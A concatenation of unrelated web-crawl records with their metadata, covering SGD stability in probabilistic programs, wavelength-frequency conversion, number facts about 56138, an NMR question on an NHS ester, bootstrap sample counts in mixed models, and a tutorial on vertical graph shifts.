These datasets, however, are often massive, and training a classifier can be computationally expensive.\n\nThe idea behind the stochastic gradient descent algorithm (SGD) is that we can instead choose a few examples at random, train the classifier only with these examples, and still obtain a classifier that performs similarly as another trained with the full data set.\n\nThe SGD algorithm satisfies a property called stability: when running SGD on two adjacent training sets (meaning that they differ in a single data point), the resulting classifiers have a similar expected loss in new examples. This means that it generalizes: it should perform well on unseen examples and it limits how much it can overfit the training set.\n\nThis is a sensitivity property: it can be specified by two distances. On the input space, we can use an adjacency distance measuring the number of differing examples between two data sets. Between the outputs, we define a distance measuring the absolute difference between expected losses. This property can then be verified by our expectation transformer, as we show in our paper.\n\nAnother interesting application of our technique is verifying the rate of convergence of Markov chains. This is also a case of sensitivity, since it depends on the distance to a stationary distribution. This has several interesting applications, such as determining the efficiency of algorithms based on Markov Chain Montecarlo\n\nIf you are interested in seeing more details and applications, please read our distinguished POPL 2021 paper.\n\nBio: Alejandro Aguirre is a postdoc at Aarhus University in the Logic and Semantics group. He works on developing logics to reason about probabilistic programs, with an emphasis on relational properties.\n\nAcknowledgements: The author would like to thank Gilles Barthe, Justin Hsu and Todd Millstein for the helpful feedback on preliminary versions of this post. This post is based on joint work with Gilles Barthe, Justin Hsu, Benjamin Kaminski, Joost-Pieter Katoen, and Christoph Matheja.\n\nDisclaimer: These posts are written by individual contributors to share their thoughts on the SIGPLAN blog for the benefit of the community. Any views or opinions represented in this blog are personal, belong solely to the blog author and do not represent those of ACM SIGPLAN or its parent organization, ACM." ]
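The running example in this post, foo(p), is stated as pseudocode; its sensitivity claim (the absolute expected difference between foo(p1) and foo(p2) is T * |p1 - p2|) can be checked with a direct Monte Carlo estimate. The Python below is a plain simulation, not the pre-expectation calculus from the paper, and the particular values of p1, p2, T and the sample size are arbitrary.

```python
# Monte Carlo check that |E[foo(p1)] - E[foo(p2)]| is about T * |p1 - p2|.
import random

def foo(p, T=10):
    """Count of 1s among T independent flips of a p-biased coin (the post's example)."""
    return sum(1 if random.random() < p else 0 for _ in range(T))

def expected_output(p, T=10, n_samples=200_000):
    return sum(foo(p, T) for _ in range(n_samples)) / n_samples

p1, p2, T = 0.30, 0.35, 10
empirical = abs(expected_output(p1, T) - expected_output(p2, T))
print(f"empirical difference   ~ {empirical:.3f}")         # about 0.5, up to Monte Carlo noise
print(f"claimed T * |p1 - p2|  = {T * abs(p1 - p2):.3f}")  # 0.500
```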
[ null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9161494,"math_prob":0.9930788,"size":11243,"snap":"2023-40-2023-50","text_gpt3_token_len":2129,"char_repetition_ratio":0.1505472,"word_repetition_ratio":0.0045095826,"special_character_ratio":0.1811794,"punctuation_ratio":0.09460154,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99674094,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-11T11:28:57Z\",\"WARC-Record-ID\":\"<urn:uuid:f2050639-67f7-471e-a503-760a1948066b>\",\"Content-Length\":\"204236\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9537e9aa-89aa-4a68-93e3-34db4557683c>\",\"WARC-Concurrent-To\":\"<urn:uuid:669a4adc-cd98-4921-8272-e0b4eb69ff34>\",\"WARC-IP-Address\":\"35.215.84.32\",\"WARC-Target-URI\":\"https://blog.sigplan.org/2021/07/15/a-pre-expectation-calculus-for-probabilistic-sensitivity/\",\"WARC-Payload-Digest\":\"sha1:VLRUO4LALMTBO2LQZVIUB5QKV5JXQBX2\",\"WARC-Block-Digest\":\"sha1:PGIGYBH74C4H3INKVKHYV2O3ESL5WZEY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679511159.96_warc_CC-MAIN-20231211112008-20231211142008-00692.warc.gz\"}"}
https://mysqlpreacher.com/what-is-the-wavelength-of-a-750-mhz-signal/
[ "Categories :\n\n## What is the wavelength of a 750 MHz signal?\n\nWavelength (λ) for electromagnetic radiation of frequency 750 MHz in Air is 39.857 cm (centimeter)\n\nHz KHz MHz GHz THz PHz EHz in\n\n## How do you calculate wavelength from MHz?\n\nHow to calculate wavelength\n\n1. Determine the frequency of the wave. For example, f = 10 MHz .\n2. Choose the velocity of the wave.\n3. Substitute these values into the wavelength equation λ = v/f .\n4. Calculate the result.\n5. You can also use this tool as a frequency calculator.\n\nHow do you calculate Wavelenght?\n\nThe wavelength is calculated from the wave speed and frequency by λ = wave speed/frequency, or λ = v / f.\n\nWhat is the frequency of 750 nm?\n\nViolet light has a wavelength of ~400 nm, and a frequency of ~7.5*1014 Hz. Red light has a wavelength of ~700 nm, and a frequency of ~4.3*1014 Hz….The EM spectrum.\n\nType of Radiation Frequency Range (Hz) Wavelength Range\nnear-infrared 1*1014 – 4*1014 2.5 μm – 750 nm\ninfrared 1013 – 1014 25 μm – 2.5 μm\n\n### How long is a 40 Hz wavelength?\n\nWavelength\n\nFrequency in Hz. Wavelength quarter wavelength\n40 28.25 feet\n50 22.6 feet\n63 17.94 feet\n80 14.13 feet\n\n### What is the wavelength of 315 MHz?\n\nWavelength (λ) for electromagnetic radiation of frequency 315 MHz in Air is 94.897 cm (centimeter)\n\nHz KHz MHz GHz THz PHz EHz =? λ (wavelength)\n\nWhat is the wavelength of 1 Hz?\n\n340 m\nWavelength of a sound in air at 1 Hz: 340 m A: These molecules already react to the inward motion of the loudspeaker membrane, moving towards the source.\n\nWhat is the frequency and wavelength?\n\nThe wavelength of a wave is the distance between any two corresponding points on adjacent waves. The frequency, represented by the Greek letter nu (ν), is the number of waves that pass a certain point in a specified amount of time. Typically, frequency is measured in units of cycles per second or waves per second.\n\n#### What is wave frequency?\n\nFrequency is a measurement of how often a recurring event such as a wave occurs in a measured amount of time. Waves can move in two ways. The frequencies of progressive waves or those that move forward indicate how fast a wave moves forward in units of cycles per unit time.\n\n#### What is the frequency of red light whose wavelength is 750 nm?\n\nusing the wave equation. So we can say the frequency lies between 4 and 4.84×1014 Hertz i.e. an extremely narrow range, showing just what a marvellously precise evolutionary structure the human eye is.\n\nWhat is the frequency of red light if its wavelength is 750 nm?\n\nTable of the Wavelengths of Various Colours, and Their Frequencies:\n\nColour Wavelength in nm Frequency in THz\nRed 750 – 610 480 – 405\nOrange 610 – 590 510 – 480\nYellow 590 – 570 530 – 510\nGreen 570 – 500 580 – 530\n\nHow to convert the frequency to the wavelength?\n\nFormulas and equations: c = λ · f λ = c / f = c · T f = c / λ. When rounding the speed of light to 300,000,000 m/s you get: Frequency. Wavelength. 
1 MHz = 1,000,000 Hz = 10 6 Hz.\n\n## How to convert megahertz to wavelength in metres?\n\nMegahertz to Wavelength In Metres Conversion Table Megahertz [MHz] Wavelength In Metres [m] 20 MHz 14.9896229 m 50 MHz 5.99584916 m 100 MHz 2.99792458 m 1000 MHz 0.299792458 m\n\n## What is the formula for the speed of light?\n\nFormula: f = C/λ Where, λ (Lambda) = Wavelength in meters c= Speed of Light (299,792,458 m/s) f= Frequency (MHz) Advertisement Other Calculators Frequency to Wavelength Calculator\n\nHow big is the wavelength of 10 GHz?\n\nFrequency Wavelength 1/4 Wavelength 1/20 Wavelength 1/100 Wavelength 3.0 GHz 10 cm 2.5 cm 5.0 mm 1.0 mm 4.0 GHz 7.5 cm 1.88 cm 3.75 mm 0.75 mm 5.0 GHz 6.0 cm 1.5 cm 3.0 mm 0.6 mm 10 GHz 3.0 cm 7.5 mm 1.5 mm 0.3 mm" ]
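The relations used throughout this page, λ = c/f and f = c/λ, take two lines of Python. The helper names are mine; the printed values line up with the figures quoted above (using the vacuum speed of light, so the 750 MHz and 315 MHz results are a fraction of a percent away from the page's "in Air" numbers).

```python
# Wavelength from frequency (lambda = c / f) and frequency from wavelength (f = c / lambda).
C = 299_792_458.0  # speed of light in m/s

def wavelength_m(frequency_hz):
    return C / frequency_hz

def frequency_from_wavelength(wavelength_m_):
    return C / wavelength_m_

print(wavelength_m(750e6) * 100)  # ~39.97 cm for 750 MHz (page quotes 39.857 cm in air)
print(wavelength_m(315e6) * 100)  # ~95.17 cm for 315 MHz (page quotes 94.897 cm in air)
print(wavelength_m(100e6))        # 2.99792458 m for 100 MHz, matching the conversion table
```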
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8199278,"math_prob":0.9970416,"size":3643,"snap":"2023-14-2023-23","text_gpt3_token_len":1090,"char_repetition_ratio":0.20307776,"word_repetition_ratio":0.047690015,"special_character_ratio":0.32747737,"punctuation_ratio":0.123893805,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9965231,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-03T18:17:30Z\",\"WARC-Record-ID\":\"<urn:uuid:4700ecbc-a8fd-40ac-83c0-ff04e0d8134e>\",\"Content-Length\":\"108599\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b6b09a83-12c6-4d04-b899-5b8b5c9b2473>\",\"WARC-Concurrent-To\":\"<urn:uuid:7500d81d-97b9-421d-b408-3bcfd427da39>\",\"WARC-IP-Address\":\"104.21.74.24\",\"WARC-Target-URI\":\"https://mysqlpreacher.com/what-is-the-wavelength-of-a-750-mhz-signal/\",\"WARC-Payload-Digest\":\"sha1:6GOOXVQLAO6X3S3X5SKKULZMWBJU6YAP\",\"WARC-Block-Digest\":\"sha1:62ZQKZMXJSFL6RINSSCIUYR3QAFQ5BRH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224649302.35_warc_CC-MAIN-20230603165228-20230603195228-00090.warc.gz\"}"}
https://metanumbers.com/56138
[ "## 56138\n\n56,138 (fifty-six thousand one hundred thirty-eight) is an even five-digits composite number following 56137 and preceding 56139. In scientific notation, it is written as 5.6138 × 104. The sum of its digits is 23. It has a total of 2 prime factors and 4 positive divisors. There are 28,068 positive integers (up to 56138) that are relatively prime to 56138.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Even\n• Number length 5\n• Sum of Digits 23\n• Digital Root 5\n\n## Name\n\nShort name 56 thousand 138 fifty-six thousand one hundred thirty-eight\n\n## Notation\n\nScientific notation 5.6138 × 104 56.138 × 103\n\n## Prime Factorization of 56138\n\nPrime Factorization 2 × 28069\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 2 Total number of distinct prime factors Ω(n) 2 Total number of prime factors rad(n) 56138 Product of the distinct prime numbers λ(n) 1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 56,138 is 2 × 28069. Since it has a total of 2 prime factors, 56,138 is a composite number.\n\n## Divisors of 56138\n\n1, 2, 28069, 56138\n\n4 divisors\n\n Even divisors 2 2 2 0\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 4 Total number of the positive divisors of n σ(n) 84210 Sum of all the positive divisors of n s(n) 28072 Sum of the proper positive divisors of n A(n) 21052.5 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 236.935 Returns the nth root of the product of n divisors H(n) 2.66657 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 56,138 can be divided by 4 positive divisors (out of which 2 are even, and 2 are odd). The sum of these divisors (counting 56,138) is 84,210, the average is 2,105,2.5.\n\n## Other Arithmetic Functions (n = 56138)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 28068 Total number of positive integers not greater than n that are coprime to n λ(n) 28068 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 5693 Total number of primes less than or equal to n r2(n) 8 The number of ways n can be represented as the sum of 2 squares\n\nThere are 28,068 positive integers (less than 56,138) that are coprime with 56,138. 
And there are approximately 5,693 prime numbers less than or equal to 56,138.\n\n## Divisibility of 56138\n\n m n mod m 2 3 4 5 6 7 8 9 0 2 2 3 2 5 2 5\n\nThe number 56,138 is divisible by 2.\n\n• Semiprime\n• Deficient\n\n• Polite\n\n• Square Free\n\n## Base conversion (56138)\n\nBase System Value\n2 Binary 1101101101001010\n3 Ternary 2212000012\n4 Quaternary 31231022\n5 Quinary 3244023\n6 Senary 1111522\n8 Octal 155512\n10 Decimal 56138\n12 Duodecimal 285a2\n20 Vigesimal 706i\n36 Base36 17be\n\n## Basic calculations (n = 56138)\n\n### Multiplication\n\nn×i\n n×2 112276 168414 224552 280690\n\n### Division\n\nni\n n⁄2 28069 18712.7 14034.5 11227.6\n\n### Exponentiation\n\nni\n n2 3151475044 176917506020072 9931794952954801936 557551105068976671083168\n\n### Nth Root\n\ni√n\n 2√n 236.935 38.29 15.3927 8.90946\n\n## 56138 as geometric shapes\n\n### Circle\n\n Diameter 112276 352725 9.90065e+09\n\n### Sphere\n\n Volume 7.4107e+14 3.96026e+10 352725\n\n### Square\n\nLength = n\n Perimeter 224552 3.15148e+09 79391.1\n\n### Cube\n\nLength = n\n Surface area 1.89089e+10 1.76918e+14 97233.9\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 168414 1.36463e+09 48616.9\n\n### Triangular Pyramid\n\nLength = n\n Surface area 5.45851e+09 2.08499e+13 45836.5\n\n## Cryptographic Hash Functions\n\nmd5 36b204e2f1feac040d9ea2c2275c5f70 e6369dbbbd28088b7a79619cc10b14cb3ec6e8db 499e80b9204229551c25bee6b1a2e98749d84dd1b81ca5350adfff6f1fc856f1 a806ce0ae442de4bde14998ff9fecec2c4519f32e9f1d33dd18dffe0cbbac0c5608699a5afcb66b64ff9c98c1eb6cdce5b3df51a49449e9f7efc624c9420dc96 65d09f626ccf3dbe367738ee1358e3608d3a4ec5" ]
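The headline facts above (56,138 = 2 × 28069, exactly four divisors summing to 84,210, and φ(56,138) = 28,068) are small enough to brute-force. The check below is a few lines of Python written only for verification; it is not how such pages are generated.

```python
# Brute-force verification of a few of the listed facts about 56138.
from math import gcd, isqrt

n = 56138

divisors = [d for d in range(1, n + 1) if n % d == 0]
print(divisors, sum(divisors))        # [1, 2, 28069, 56138] 84210

def is_prime(m):
    return m > 1 and all(m % k for k in range(2, isqrt(m) + 1))

print(is_prime(28069))                # True, so 56138 = 2 * 28069 is a semiprime

print(sum(1 for k in range(1, n + 1) if gcd(k, n) == 1))  # 28068, the Euler totient
```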
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.60733765,"math_prob":0.98554003,"size":4505,"snap":"2020-34-2020-40","text_gpt3_token_len":1603,"char_repetition_ratio":0.11975116,"word_repetition_ratio":0.028528528,"special_character_ratio":0.45038846,"punctuation_ratio":0.07881137,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9951822,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-14T19:41:34Z\",\"WARC-Record-ID\":\"<urn:uuid:7a77eec2-6a2c-4151-a6fd-e0c8671eef9a>\",\"Content-Length\":\"47696\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2c52d311-4d75-435f-bddb-8e060d9bd45b>\",\"WARC-Concurrent-To\":\"<urn:uuid:49d0cbd8-2e6a-40cb-a11d-eadbd16eed87>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/56138\",\"WARC-Payload-Digest\":\"sha1:FDOOG7ZO74N4NWOMO5VYZWD5PBVYCVVL\",\"WARC-Block-Digest\":\"sha1:FEXJX3NSWTMPVL3A52OVBY6Y5IJUMI4J\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439739370.8_warc_CC-MAIN-20200814190500-20200814220500-00350.warc.gz\"}"}
https://chemistry.stackexchange.com/questions/116642/dcc-coupling-of-n-hydroxysuccinimide-and-2-2-dimethoxyacetic-acid/116650
[ "# DCC coupling of N-hydroxysuccinimide and 2,2-dimethoxyacetic acid\n\nI am forming N-hydroxysuccinimide ester (1) by DCC coupling with N-hydroxysuccinimide and 2,2-dimethoxyacetic acid using distilled THF as solvent.", null, "What I see on $$\\ce{^1H}$$-NMR is three major singlets: $$\\delta~\\pu{4.840 ppm}~(1\\ce{H}),$$ $$\\delta~\\pu{3.432 ppm}~(7.26\\ce{H}),$$ $$\\delta ~\\pu{2.731 ppm}~(6.36\\ce{H})$$ and some impurities.\n\nWhile the chemical shifts are well-aligned with theoretical predictions (in my opinion), integration ratios do not quite make sense. I wish I could purify it to have a clearer NMR spectrum and see whether I actually have the desired product, but I don't think my ester will stay stable in silica in column chromatography. Any suggestions?\n\n• Maybe take or get an NMR of the reagents and theoretical side products and see if there can be any overlap with the signals you see. I'm not sure I understand what your doubt is, though. NMR integration is not always very precise, especially for acidic protons. – user6376297 Jun 10 '19 at 15:17\n• What is your next reaction with this product? – Waylander Jun 10 '19 at 15:18\n• @user6376297 I have already taken the NMR of 2,2-Dimethoxy Acetic acid: $\\delta \\: \\pu{4.867 ppm}$ (1H) and $\\delta \\: \\pu{3.4615 ppm}$ (6.6H) (c.f. $\\delta \\: \\pu{4.840 ppm}$ (1H) and $\\delta \\: \\pu{3.432 ppm}$ (7.26H) in my product NMR) Not sure whether I can argue that peaks have 'shifted' in the product NMR – chemrese Jun 11 '19 at 3:37\n\nIf peaks for \"some impurities\" are appear around $$\\delta \\: \\pu{1.8 ppm}$$, I assume you have residual THF in your crude product. The other multiplet of THF is probably burried under $$\\delta \\: \\pu{3.43 ppm}$$ resonance. That would confirmed by your impurity integration, which should be equal to 1H unit equivalence. If I'm right, your 6.36H unit equivalence is actually overlap one of $$\\ce{CH3}$$-resonance and one of $$\\ce{CH2}$$-resonance.\nOn the other hand, the two resonances at $$\\delta \\: \\pu{3.43 ppm}$$ and $$\\delta \\: \\pu{2.73 ppm}$$ would very well be representing two $$\\ce{CH3}$$-groups and (two $$\\ce{CH2}$$-groups + part of THF impurity), respectively, as well." ]
[ null, "https://i.stack.imgur.com/6pUMD.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90674436,"math_prob":0.9920017,"size":671,"snap":"2021-04-2021-17","text_gpt3_token_len":207,"char_repetition_ratio":0.089955024,"word_repetition_ratio":0.0,"special_character_ratio":0.27868852,"punctuation_ratio":0.11764706,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98075944,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-21T21:45:31Z\",\"WARC-Record-ID\":\"<urn:uuid:eee0f2bd-c774-48fe-bcab-dc7ccb9dd9ff>\",\"Content-Length\":\"152456\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7d71f608-0787-4038-88c9-1174f65cb541>\",\"WARC-Concurrent-To\":\"<urn:uuid:9366c06c-808c-4a85-9213-fe6ae666336d>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://chemistry.stackexchange.com/questions/116642/dcc-coupling-of-n-hydroxysuccinimide-and-2-2-dimethoxyacetic-acid/116650\",\"WARC-Payload-Digest\":\"sha1:53OROGYYPRCNFYR4VK6JF6IRBR2TYXWD\",\"WARC-Block-Digest\":\"sha1:SRFEEYBINDDZCYR56FYSWELI2WMS3FO2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703527850.55_warc_CC-MAIN-20210121194330-20210121224330-00177.warc.gz\"}"}
https://stats.stackexchange.com/questions/373658/number-of-bootstrap-samples-to-construct-confidence-interval-in-mixed-models
[ "# Number of bootstrap samples to construct confidence interval in mixed models [duplicate]\n\nlibrary(lme4)\nlibrary(merTools)\ndata(sleepstudy)\nfm1 <- lmer(Reaction ~ Days + (Days|Subject), data=sleepstudy)\nPI <- predictInterval(merMod = fm1, newdata = sleepstudy,\nlevel = 0.95, n.sims = 1000,\nstat = \"median\", type=\"linear.prediction\",\ninclude.resid.var = TRUE)\n\n\nMy question is: is there a rule of thumb of what the value of n.sims should be?\n\nEDIT\n\nMy data contains 20686 rows (i.e. 20686 response variables) and 20 predictors. For such dataset, how many bootstrap samples are required? Is there any plots or papers that I can refer to that explain the number of bootstrap samples as a function of data size?\n\n• More is better. Bootstrapping takes random subsamples with replacement, so the more often you do this, the smaller the chance your results are affected by the stochastic nature of this approach. For your final model you should do whatever number of bootstrap samples $$B$$ is still computationally feasible.\n• If your data set is very large, or your model very complex, then $$B=1,000$$ may be prohibitively large for simple trial and error, so you could start with a lower number, bearing in mind that the variance will be larger.\nFor example, if $$B=1,000$$ takes 10 minutes to run on your system, then simply halving to $$B=500$$ will already allow you to do twice as much trial and error in the same time. Your final comparisons could then be run overnight with a much larger number (e.g. $$B=10,000$$).\n• Try running bootstrap with e.g. $10$ samples, not to draw any conclusions from it, but just to figure out how well your computer/server is handling that. Based on that you can decide how many bootstrap samples you want to use for initial trial and error. Once you know which models you want to compare, run them with a larger number of bootstrap samples. Oct 25, 2018 at 9:12" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7673116,"math_prob":0.9851315,"size":612,"snap":"2023-40-2023-50","text_gpt3_token_len":167,"char_repetition_ratio":0.098684214,"word_repetition_ratio":0.0,"special_character_ratio":0.2777778,"punctuation_ratio":0.17355372,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9871025,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-01T20:11:27Z\",\"WARC-Record-ID\":\"<urn:uuid:6aecab40-603f-40ce-b921-d1f39b83d61d>\",\"Content-Length\":\"145524\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:766b8bad-d032-4142-b1de-3de64cc817f1>\",\"WARC-Concurrent-To\":\"<urn:uuid:6cd56b96-fe03-4c46-8236-14d77365a3ee>\",\"WARC-IP-Address\":\"172.64.144.30\",\"WARC-Target-URI\":\"https://stats.stackexchange.com/questions/373658/number-of-bootstrap-samples-to-construct-confidence-interval-in-mixed-models\",\"WARC-Payload-Digest\":\"sha1:VQHZI7AIR5WALDYBEDVB262URP2AXYEX\",\"WARC-Block-Digest\":\"sha1:WXU3WWHBRXSPIY52DWETREKPZNXXVYP2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100304.52_warc_CC-MAIN-20231201183432-20231201213432-00763.warc.gz\"}"}
https://scienceplusplus.com/graph-fx-to-fx-%C2%B1-a/
[ "", null, "# Graph f(x) to f(x) ± a\n\nContent-\n\n## Graph : f(x) -> f(x) ± a\n\nIn mathematics  , Graph is pictorial representation of data or values in an organized manner.\n\nIn graph , the point in ordered in the graph related to another point. So , actually points on the graph related to each other.\n\nWe are advised to student to study this section carefully ,because it gives a very short approaches to various lengthy problem in competitive examination.\n\nTransformation :\n\n1 .       f(x) to f(x) ± a , when f(x) is given\n\nWhere  ‘a’ is positive constant.\n\n1.1     f(x) —>  f(x) + a\n\nHere ‘a’ upward shifting in f(x).\n\nSo , shift the given graph of f(x)  ‘a’  unit upward.", null, "1.2     f(x) —>  f(x) – a\n\nHere ‘a’ downward shifting in f(x).\n\nSo , shift the given  graph of f(x)  ‘a’  unit downward.", null, "## Example 1. Draw graph :\n\n##### 1.  y = ex\n\nWe know that\n\ny = ex  is  an exponential function & it is plotted  like as—", null, "### 2. y = ex+ 1\n\nf(x) —> f(x) +a , when f(x) is given\n\nHere f(x) = ex\n\nTo draw  y = ex + 1  ,\n\n+1 unit upward shifting\n\nSo , graph  look like as —", null, "#### 3.  y = ex – 1\n\nf(x) —> f(x) – a , when f(x) is given\n\nHere f(x) = ex\n\nTo draw  y = ex – 1  ,\n\n– 1 unit downward shifting\n\nSo , graph is look like as —", null, "Example 2.  Draw graph —\n\n1.   y = | x |\n2. y  = | x | + 1\n3. y  = | x | – 1\n1. #### y = | x |\n\nWe know that\n\ny = |x|   is  an modulus function & it can plotted  like  as—\n\ny = | x | = -x  for x <0\n\ny = | x | =  x  for x > 0", null, "#### 2.  y = |x| + 1\n\nf(x) —> f(x) +a , when f(x) is given\n\nHere f(x) =  | x |\n\nTo draw  y =  |x |+ 1  ,  1 unit upward shifting\n\nSo , graph  look like as —\n\ny = | x | + 1  = -x + 1 , for x <0\n\ny = | x | + 1  =  x + 1 , for x > 0", null, "### 3.  y = |x| – 1\n\nf(x) —> f(x) – a , when f(x) is given\n\nHere f(x) = |x|\n\nTo draw  y = |x| – 1  ,  1 unit downward shifting\n\nSo , graph  look like as —\n\ny = | x | + 1  = -x – 1 , for x <0\n\ny = | x | + 1  =  x – 1 , for x > 0", null, "error: Content is protected !!" ]
[ null, "https://scienceplusplus.com/wp-content/uploads/2020/11/yex1.001.png", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/fxa.001.jpeg", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/fx-a.001.jpeg", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/y-ex-.001.png", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/yex1.001.png", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/yex-1.001.png", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/yx.001.png", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/yx1.001.png", null, "https://scienceplusplus.com/wp-content/uploads/2020/11/yx-1.001.png", null ]
